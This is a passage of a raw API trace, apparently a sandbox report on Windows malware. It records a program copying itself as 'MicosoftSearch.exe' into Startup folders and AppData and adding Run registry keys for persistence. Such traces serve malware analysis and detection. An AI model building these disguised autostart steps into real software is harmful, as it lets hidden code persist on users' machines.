out: hHeap=0xb00000) returned 1 [0240.080] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xba7ab0 | out: hHeap=0xb00000) returned 1 [0240.080] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x100000) returned 0x940020 [0240.080] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.080] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb5d068 [0240.080] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.080] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb84240 [0240.081] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0240.081] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0240.081] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x0) returned 1 [0240.081] lstrlenW (lpString="kernel32.dll") returned 12 [0240.081] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5d068 | out: hHeap=0xb00000) returned 1 [0240.081] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0240.081] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84240 | out: hHeap=0xb00000) returned 1 [0240.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0240.081] CreateFileW (lpFileName="C:\\Windows\\System32\\MicosoftSearch.exe" (normalized: "c:\\windows\\system32\\micosoftsearch.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0240.082] CloseHandle (hObject=0xe0) returned 1 [0240.082] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.082] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb84240 [0240.082] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.082] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb841f0 [0240.082] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0240.082] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0240.082] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x1) returned 1 [0240.082] lstrlenW (lpString="kernel32.dll") returned 12 [0240.082] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb841f0 | out: hHeap=0xb00000) returned 1 [0240.082] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0240.082] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84240 | out: hHeap=0xb00000) returned 1 [0240.082] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x940020 | out: hHeap=0xb00000) returned 1 [0240.082] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xba7ab0 [0240.082] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xbb7ab8 [0240.082] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.082] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb84240 [0240.082] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb84240, Size=0x40) returned 0xb828c0 [0240.082] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb828c0, Size=0x80) returned 0xbc7ad8 [0240.082] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xb820b8 [0240.082] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0240.082] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb820b8 | out: hHeap=0xb00000) returned 1 [0240.083] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\MicosoftSearch.exe", lpDst=0xba7ab0, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MicosoftSearch.exe") returned 0x41 [0240.083] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbb7ab8 | out: hHeap=0xb00000) returned 1 [0240.083] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xba7ab0 | out: hHeap=0xb00000) returned 1 [0240.083] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x100000) returned 0x940020 [0240.083] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.083] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb84240 [0240.083] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.083] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb841f0 [0240.083] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0240.083] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0240.083] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x1) returned 1 [0240.083] lstrlenW (lpString="kernel32.dll") returned 12 [0240.083] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84240 | out: hHeap=0xb00000) returned 1 [0240.083] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0240.083] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb841f0 | out: hHeap=0xb00000) returned 1 [0240.083] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0240.083] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\micosoftsearch.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0240.084] ReadFile (in: hFile=0xe0, lpBuffer=0x940020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd04, lpOverlapped=0x0 | out: lpBuffer=0x940020*, lpNumberOfBytesRead=0x18fd04*=0x5e400, lpOverlapped=0x0) returned 1 [0240.099] WriteFile (in: hFile=0xe4, lpBuffer=0x940020*, nNumberOfBytesToWrite=0x5e400, lpNumberOfBytesWritten=0x18fd04, lpOverlapped=0x0 | out: lpBuffer=0x940020*, lpNumberOfBytesWritten=0x18fd04*=0x5e400, lpOverlapped=0x0) returned 1 [0240.106] ReadFile (in: hFile=0xe0, lpBuffer=0x940020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd04, lpOverlapped=0x0 | out: lpBuffer=0x940020*, lpNumberOfBytesRead=0x18fd04*=0x0, lpOverlapped=0x0) returned 1 [0240.106] CloseHandle (hObject=0xe4) returned 1 [0240.106] CloseHandle (hObject=0xe0) returned 1 [0240.106] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.106] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb841f0 [0240.106] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.106] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb84240 [0240.106] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0240.106] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0240.106] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x1) returned 1 [0240.106] lstrlenW (lpString="kernel32.dll") returned 12 [0240.106] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84240 | out: hHeap=0xb00000) returned 1 [0240.106] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0240.106] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb841f0 | out: hHeap=0xb00000) returned 1 [0240.107] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x940020 | out: hHeap=0xb00000) returned 1 [0240.111] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d5e0 [0240.111] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d5e0, Size=0x20) returned 0xb841f0 [0240.111] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb841f0, Size=0x40) returned 0xb828c0 [0240.111] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb828c0, Size=0x80) returned 0xbc7ad8 [0240.111] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MicosoftSearch.exe") returned 64 [0240.111] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0240.111] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x5c) returned 0xb820b8 [0240.111] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fcd8 | out: phkResult=0x18fcd8*=0xe0) returned 0x0 [0240.111] RegSetValueExW (hKey=0xe0, lpValueName="MicosoftSearch.exe", Reserved=0x0, dwType=0x1, lpData=0xb87aa0, cbData=0x80) returned 0x5 [0240.111] RegCloseKey (hKey=0xe0) returned 0x0 [0240.111] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb820b8 | out: hHeap=0xb00000) returned 1 [0240.111] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MicosoftSearch.exe") returned 64 [0240.112] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0240.112] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x5c) returned 0xb820b8 [0240.112] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fcd8 | out: phkResult=0x18fcd8*=0xe4) returned 0x0 [0240.112] RegSetValueExW (in: hKey=0xe4, lpValueName="MicosoftSearch.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MicosoftSearch.exe", cbData=0x80 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MicosoftSearch.exe") returned 0x0 [0240.112] RegCloseKey (hKey=0xe4) returned 0x0 [0240.112] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb820b8 | out: hHeap=0xb00000) returned 1 [0240.112] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0240.112] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc7ad8 | out: hHeap=0xb00000) returned 1 [0240.112] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xba7ab0 [0240.112] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xbb7ab8 [0240.112] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.112] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb841f0 [0240.112] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb841f0, Size=0x40) returned 0xb828c0 [0240.112] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb828c0, Size=0x80) returned 0xbc7ad8 [0240.112] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xb820b8 [0240.112] lstrlenW (lpString="") returned 0 [0240.112] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0240.112] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8c) returned 0xb84a08 [0240.112] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fc84 | out: phkResult=0x18fc84*=0xe4) returned 0x0 [0240.112] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fc90, lpData=0xbb7ab8, lpcbData=0x18fcbc*=0x7fff | out: lpType=0x18fc90*=0x0, lpData=0xbb7ab8*=0x53, lpcbData=0x18fcbc*=0x7fff) returned 0x2 [0240.112] RegCloseKey (hKey=0xe4) returned 0x0 [0240.112] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84a08 | out: hHeap=0xb00000) returned 1 [0240.112] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0240.112] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8c) returned 0xb84a08 [0240.112] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fc84 | out: phkResult=0x18fc84*=0xe4) returned 0x0 [0240.112] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fc90, lpData=0xbb7ab8, lpcbData=0x18fcbc*=0x7fff | out: lpType=0x18fc90*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fcbc*=0x98) returned 0x0 [0240.112] RegCloseKey (hKey=0xe4) returned 0x0 [0240.112] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84a08 | out: hHeap=0xb00000) returned 1 [0240.112] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0240.112] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0240.112] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb820b8 | out: hHeap=0xb00000) returned 1 [0240.113] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe", lpDst=0xba7ab0, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe") returned 0x6f [0240.113] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbb7ab8 | out: hHeap=0xb00000) returned 1 [0240.113] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xba7ab0 | out: hHeap=0xb00000) returned 1 [0240.113] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x100000) returned 0x940020 [0240.113] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.113] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb841f0 [0240.113] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.113] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb84240 [0240.113] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0240.113] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0240.113] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x1) returned 1 [0240.113] lstrlenW (lpString="kernel32.dll") returned 12 [0240.113] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb841f0 | out: hHeap=0xb00000) returned 1 [0240.113] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0240.113] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84240 | out: hHeap=0xb00000) returned 1 [0240.113] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0240.113] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0240.113] CloseHandle (hObject=0xe4) returned 1 [0240.113] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.113] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb84240 [0240.113] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.113] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb841f0 [0240.114] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0240.114] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0240.114] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x1) returned 1 [0240.114] lstrlenW (lpString="kernel32.dll") returned 12 [0240.114] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb841f0 | out: hHeap=0xb00000) returned 1 [0240.114] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0240.114] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84240 | out: hHeap=0xb00000) returned 1 [0240.114] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x940020 | out: hHeap=0xb00000) returned 1 [0240.114] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xba7ab0 [0240.114] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xbb7ab8 [0240.114] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.114] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb84240 [0240.114] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb84240, Size=0x40) returned 0xb828c0 [0240.114] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb828c0, Size=0x80) returned 0xbc7ad8 [0240.114] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xb820b8 [0240.114] lstrlenW (lpString="") returned 0 [0240.114] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0240.114] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8c) returned 0xb84a08 [0240.114] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fc84 | out: phkResult=0x18fc84*=0xe4) returned 0x0 [0240.114] RegQueryValueExW (in: hKey=0xe4, lpValueName="Common Startup", lpReserved=0x0, lpType=0x18fc90, lpData=0xbb7ab8, lpcbData=0x18fcbc*=0x7fff | out: lpType=0x18fc90*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fcbc*=0x78) returned 0x0 [0240.114] RegCloseKey (hKey=0xe4) returned 0x0 [0240.114] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84a08 | out: hHeap=0xb00000) returned 1 [0240.114] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0240.114] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0240.114] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb820b8 | out: hHeap=0xb00000) returned 1 [0240.114] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe", lpDst=0xba7ab0, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe") returned 0x50 [0240.114] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbb7ab8 | out: hHeap=0xb00000) returned 1 [0240.114] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xba7ab0 | out: hHeap=0xb00000) returned 1 [0240.114] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x100000) returned 0x940020 [0240.114] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.114] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb84240 [0240.115] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.115] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb841f0 [0240.115] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0240.115] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0240.115] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x1) returned 1 [0240.115] lstrlenW (lpString="kernel32.dll") returned 12 [0240.115] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84240 | out: hHeap=0xb00000) returned 1 [0240.115] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0240.115] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb841f0 | out: hHeap=0xb00000) returned 1 [0240.115] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0240.115] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0240.115] CloseHandle (hObject=0xe4) returned 1 [0240.115] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.115] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb841f0 [0240.115] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.115] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb84240 [0240.115] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0240.116] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0240.116] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd08 | out: OldValue=0x18fd08*=0x1) returned 1 [0240.116] lstrlenW (lpString="kernel32.dll") returned 12 [0240.116] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84240 | out: hHeap=0xb00000) returned 1 [0240.116] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0240.116] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb841f0 | out: hHeap=0xb00000) returned 1 [0240.116] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x940020 | out: hHeap=0xb00000) returned 1 [0240.116] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb87aa0 | out: hHeap=0xb00000) returned 1 [0240.116] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb97aa8 | out: hHeap=0xb00000) returned 1 [0240.117] lstrlenW (lpString="%windir%\\System32") returned 17 [0240.117] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb82830 | out: hHeap=0xb00000) returned 1 [0240.117] lstrlenW (lpString="%appdata%") returned 9 [0240.117] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5d0e0 | out: hHeap=0xb00000) returned 1 [0240.117] lstrlenW (lpString="%sh(Startup)%") returned 13 [0240.117] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5d0b8 | out: hHeap=0xb00000) returned 1 [0240.117] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0240.117] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb82878 | out: hHeap=0xb00000) returned 1 [0240.117] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.117] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb5d0b8 [0240.117] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d0b8, Size=0x40) returned 0xb82878 [0240.117] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb82878, Size=0x80) returned 0xbc7ad8 [0240.117] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.117] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb5d0b8 [0240.117] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x1fffc) returned 0xb87aa0 [0240.117] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xba7aa8 [0240.117] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0xbb7ab0 [0240.117] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb7d610 [0240.117] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb7d610, Size=0x20) returned 0xb5d0e0 [0240.117] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d0e0, Size=0x40) returned 0xb82878 [0240.117] RtlReAllocateHeap 